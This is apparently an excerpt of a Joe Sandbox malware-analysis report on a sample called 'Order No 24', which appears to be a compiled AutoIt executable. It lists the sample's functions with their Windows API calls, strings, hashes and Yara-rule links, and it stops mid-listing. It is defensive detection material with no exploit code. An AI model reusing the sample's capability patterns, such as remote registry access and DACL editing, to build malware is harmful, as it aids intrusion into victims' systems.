                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3840717409-0
                                                                                                                                  • Opcode ID: 0d0e4dd9958a56ed702592ed4402245d056587ea6a22a451a5e3cf64a056e4c8
                                                                                                                                  • Instruction ID: fbf30fd0daefdcab56aff4e7fea249a81101722125618741366e5a6fad6fd350
                                                                                                                                  • Opcode Fuzzy Hash: 0d0e4dd9958a56ed702592ed4402245d056587ea6a22a451a5e3cf64a056e4c8
                                                                                                                                  • Instruction Fuzzy Hash: F9414A76600209FFDB11DFA5DC88EAA7BB8EF89715F108458F90AD7260D7319D42CB20
                                                                                                                                  Function 009D05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __wsplitpath.LIBCMT ref: 009D076F
                                                                                                                                  • _wcscat.LIBCMT ref: 009D0787
                                                                                                                                  • _wcscat.LIBCMT ref: 009D0799
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009D07AE
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 009D07C2
                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 009D07DA
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 009D07F4
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0806
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 34673085-438819550
                                                                                                                                  • Opcode ID: 36cb35beb727fd31c635ed354a77f22a3e82816b036c5c23c7e3b4291ec9eb91
                                                                                                                                  • Instruction ID: a9895991b9ed2b37a141578608eae015e0daf0c1e6b5c612cd0d10f6ea2d0810
                                                                                                                                  • Opcode Fuzzy Hash: 36cb35beb727fd31c635ed354a77f22a3e82816b036c5c23c7e3b4291ec9eb91
                                                                                                                                  • Instruction Fuzzy Hash: 15817A725443019FCB24EF64C845A6EB7E8ABD8304F58CD2FF889C7351EA34E9558B92
                                                                                                                                  Function 009EEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009EEF3B
                                                                                                                                  • GetFocus.USER32 ref: 009EEF4B
                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 009EEF56
                                                                                                                                  • _memset.LIBCMT ref: 009EF081
                                                                                                                                  • GetMenuItemInfoW.USER32 ref: 009EF0AC
                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 009EF0CC
                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 009EF0DF
                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 009EF113
                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 009EF15B
                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009EF193
                                                                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 009EF1C8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 1296962147-4108050209
                                                                                                                                  • Opcode ID: 65f18f295af33989838b6a71dfd264268537ad7ff11de3b24caf054d88890add
                                                                                                                                  • Instruction ID: 369ed231cf425bd431491737d84534d23c80ce5b8ef20d0308eea3c5d6fb61f6
                                                                                                                                  • Opcode Fuzzy Hash: 65f18f295af33989838b6a71dfd264268537ad7ff11de3b24caf054d88890add
                                                                                                                                  • Instruction Fuzzy Hash: 27819F71608345EFDB11CF56C894A6BBBE9FB88314F00492EF99897291D731DD06CB92
                                                                                                                                  Function 009BA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 009BABD7
                                                                                                                                    • Part of subcall function 009BABBB: GetLastError.KERNEL32(?,009BA69F,?,?,?), ref: 009BABE1
                                                                                                                                    • Part of subcall function 009BABBB: GetProcessHeap.KERNEL32(00000008,?,?,009BA69F,?,?,?), ref: 009BABF0
                                                                                                                                    • Part of subcall function 009BABBB: HeapAlloc.KERNEL32(00000000,?,009BA69F,?,?,?), ref: 009BABF7
                                                                                                                                    • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 009BAC0E
                                                                                                                                    • Part of subcall function 009BAC56: GetProcessHeap.KERNEL32(00000008,009BA6B5,00000000,00000000,?,009BA6B5,?), ref: 009BAC62
                                                                                                                                    • Part of subcall function 009BAC56: HeapAlloc.KERNEL32(00000000,?,009BA6B5,?), ref: 009BAC69
                                                                                                                                    • Part of subcall function 009BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009BA6B5,?), ref: 009BAC7A
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009BA8CB
                                                                                                                                  • _memset.LIBCMT ref: 009BA8E0
                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009BA8FF
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009BA910
                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 009BA94D
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009BA969
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009BA986
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009BA995
                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 009BA99C
                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009BA9BD
                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 009BA9C4
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009BA9F5
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009BAA1B
                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009BAA2F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3996160137-0
                                                                                                                                  • Opcode ID: fe48a449652a4b41683c138cd50b93e7fce95ad0ea456cb30e89e36227d99424
                                                                                                                                  • Instruction ID: 7c0e30f274911eaec0af161b7ccc8d84be0a8dfc2e8f70fcf0be4b2dabbbef34
                                                                                                                                  • Opcode Fuzzy Hash: fe48a449652a4b41683c138cd50b93e7fce95ad0ea456cb30e89e36227d99424
                                                                                                                                  • Instruction Fuzzy Hash: 16512B71900219AFDF14DFD4DE85AEEBBBAFF44310F048129F916A7290DB359A06CB61
                                                                                                                                  Function 009D9DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 009D9E36
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009D9E42
                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 009D9E4E
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 009D9E5B
                                                                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 009D9EAF
                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 009D9EEB
                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 009D9F0F
                                                                                                                                  • SelectObject.GDI32(00000006,?), ref: 009D9F17
                                                                                                                                  • DeleteObject.GDI32(?), ref: 009D9F20
                                                                                                                                  • DeleteDC.GDI32(00000006), ref: 009D9F27
                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 009D9F32
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                  • String ID: (
                                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                                  • Opcode ID: 17d8d7d7f710f42d69b1792be09426f0f08ccd1bfba57cf6cb99d0314208d9f6
                                                                                                                                  • Instruction ID: ee83348edda8e67dfe173b9f91aff375f7f7aecc85fd605978ae648c9f2c58ef
                                                                                                                                  • Opcode Fuzzy Hash: 17d8d7d7f710f42d69b1792be09426f0f08ccd1bfba57cf6cb99d0314208d9f6
                                                                                                                                  • Instruction Fuzzy Hash: C0513B76940309AFCB14DFA8D885EAEBBB9EF48310F14851EF95A97350C735A941CB60
                                                                                                                                  Function 009CCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LoadString__swprintf_wprintf
                                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                  • API String ID: 2889450990-2391861430
                                                                                                                                  • Opcode ID: 03896a8e3ca2a985560eb69ef0f913368761dac0e170933e9b1cb24a9ab71d2b
                                                                                                                                  • Instruction ID: d2be4fa80fffaa7609bbb8058a81da665d59d1e0fc8d86a6851dc4316e6cc89f
                                                                                                                                  • Opcode Fuzzy Hash: 03896a8e3ca2a985560eb69ef0f913368761dac0e170933e9b1cb24a9ab71d2b
                                                                                                                                  • Instruction Fuzzy Hash: 52516B72800509BACB15FBE0CD46FEEBB78AF85304F10056AF505721A2EB316E99DB61
                                                                                                                                  Function 009CCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LoadString__swprintf_wprintf
                                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                  • API String ID: 2889450990-3420473620
                                                                                                                                  • Opcode ID: db43995b549c823ee640b5623b518a6ebc97ed14fe3c5ff76048773b273ac32a
                                                                                                                                  • Instruction ID: 5c5e5b72a82603096281f48ecdbe3c16fa932c06ebc61937ea398f7ef75c3fe2
                                                                                                                                  • Opcode Fuzzy Hash: db43995b549c823ee640b5623b518a6ebc97ed14fe3c5ff76048773b273ac32a
                                                                                                                                  • Instruction Fuzzy Hash: C7517C72800609BACB15FBE0CD46FEEBB78AF44340F100469F50972192EA356E99DB61
                                                                                                                                  Function 009C55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009C55D7
                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 009C5664
                                                                                                                                  • GetMenuItemCount.USER32(00A41708), ref: 009C56ED
                                                                                                                                  • DeleteMenu.USER32(00A41708,00000005,00000000,000000F5,?,?), ref: 009C577D
                                                                                                                                  • DeleteMenu.USER32(00A41708,00000004,00000000), ref: 009C5785
                                                                                                                                  • DeleteMenu.USER32(00A41708,00000006,00000000), ref: 009C578D
                                                                                                                                  • DeleteMenu.USER32(00A41708,00000003,00000000), ref: 009C5795
                                                                                                                                  • GetMenuItemCount.USER32(00A41708), ref: 009C579D
                                                                                                                                  • SetMenuItemInfoW.USER32(00A41708,00000004,00000000,00000030), ref: 009C57D3
                                                                                                                                  • GetCursorPos.USER32(?), ref: 009C57DD
                                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 009C57E6
                                                                                                                                  • TrackPopupMenuEx.USER32(00A41708,00000000,?,00000000,00000000,00000000), ref: 009C57F9
                                                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009C5805
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3993528054-0
                                                                                                                                  • Opcode ID: 3186b1d00fc4446fdd89e3aedfc5ee0ee0c7c61773e761f5eeb69e484d70f914
                                                                                                                                  • Instruction ID: 1694ae4dcb91ffba33a1ccd35ace7fcbdba3c28fd9514474dbd0f09b328aa48a
                                                                                                                                  • Opcode Fuzzy Hash: 3186b1d00fc4446fdd89e3aedfc5ee0ee0c7c61773e761f5eeb69e484d70f914
                                                                                                                                  • Instruction Fuzzy Hash: BC71F471A40A09BFEB209B54CD49FAABF69FF40368F250209F518AA1D1C7717C90DB92
                                                                                                                                  Function 009BA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009BA1DC
                                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009BA211
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009BA22D
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009BA249
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009BA273
                                                                                                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 009BA29B
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009BA2A6
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009BA2AB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                  • API String ID: 1687751970-22481851
                                                                                                                                  • Opcode ID: 511fcbaeac0aeed9285eaefacf36d3143aa9426fb9c092f34871d0562f3881ef
                                                                                                                                  • Instruction ID: 703979713b5aedd512b4a86f851bfd9901dbd61e039a3d3507105a3eaad16b69
                                                                                                                                  • Opcode Fuzzy Hash: 511fcbaeac0aeed9285eaefacf36d3143aa9426fb9c092f34871d0562f3881ef
                                                                                                                                  • Instruction Fuzzy Hash: 7141E676C1062DAADB11EFE4DC85EEDB7B8BF44310F004469F815A72A1EB709E05CB90
                                                                                                                                  Function 009E3C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                  • API String ID: 3964851224-909552448
                                                                                                                                  • Opcode ID: a0a83c65d341fe9fea16ce13c1e4fdfc9863519daf604cd6b45aaf80325adb02
                                                                                                                                  • Instruction ID: 4649a98ed83e7d52198371be860b1c480b3133cf7e7b3e19d0bb98f6d57832bf
                                                                                                                                  • Opcode Fuzzy Hash: a0a83c65d341fe9fea16ce13c1e4fdfc9863519daf604cd6b45aaf80325adb02
                                                                                                                                  • Instruction Fuzzy Hash: 08414D3051028A9BDF01EF15DC55AEA3369BFA6340F508858FCD65B392EB71EE4ACB50
                                                                                                                                  Function 009C25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009F36F4,00000010,?,Bad directive syntax error,00A1DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009C25D6
                                                                                                                                  • LoadStringW.USER32(00000000,?,009F36F4,00000010), ref: 009C25DD
                                                                                                                                  • _wprintf.LIBCMT ref: 009C2610
                                                                                                                                  • __swprintf.LIBCMT ref: 009C2632
                                                                                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009C26A1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                  • API String ID: 1080873982-4153970271
                                                                                                                                  • Opcode ID: cc2dca5180c8ed8131c6dfea0b4616fe2fb23f65d1b3d6924c8bc1d20ccb7f6c
                                                                                                                                  • Instruction ID: b5c0463ef9b926ad9d378b6c52c79dee850257cdb7616e8fde12a6ee4a0c74f9
                                                                                                                                  • Opcode Fuzzy Hash: cc2dca5180c8ed8131c6dfea0b4616fe2fb23f65d1b3d6924c8bc1d20ccb7f6c
                                                                                                                                  • Instruction Fuzzy Hash: CC215E7280021EBFCF11FB90CC4AFEE7B79BF18304F00485AF505661A2DA71A619DB61
                                                                                                                                  Function 009C7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009C7B42
                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009C7B58
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009C7B69
                                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009C7B7B
                                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009C7B8C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SendString
                                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                  • API String ID: 890592661-1007645807
                                                                                                                                  • Opcode ID: bc4ab31c37ecbf16c856a7ded55865d4a1d54abf0725331b24bd1a77e18e4cac
                                                                                                                                  • Instruction ID: df087efa814d35ce8d9a8fb8984f2010dde3a4f56e96c9dadc6170ea029750b9
                                                                                                                                  • Opcode Fuzzy Hash: bc4ab31c37ecbf16c856a7ded55865d4a1d54abf0725331b24bd1a77e18e4cac
                                                                                                                                  • Instruction Fuzzy Hash: 1B1194E2A542597ADB20F7A5CC4AEFFBA7CFBD1B10F0008197411A61D1DA605E49CAB1
                                                                                                                                  Function 009C778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
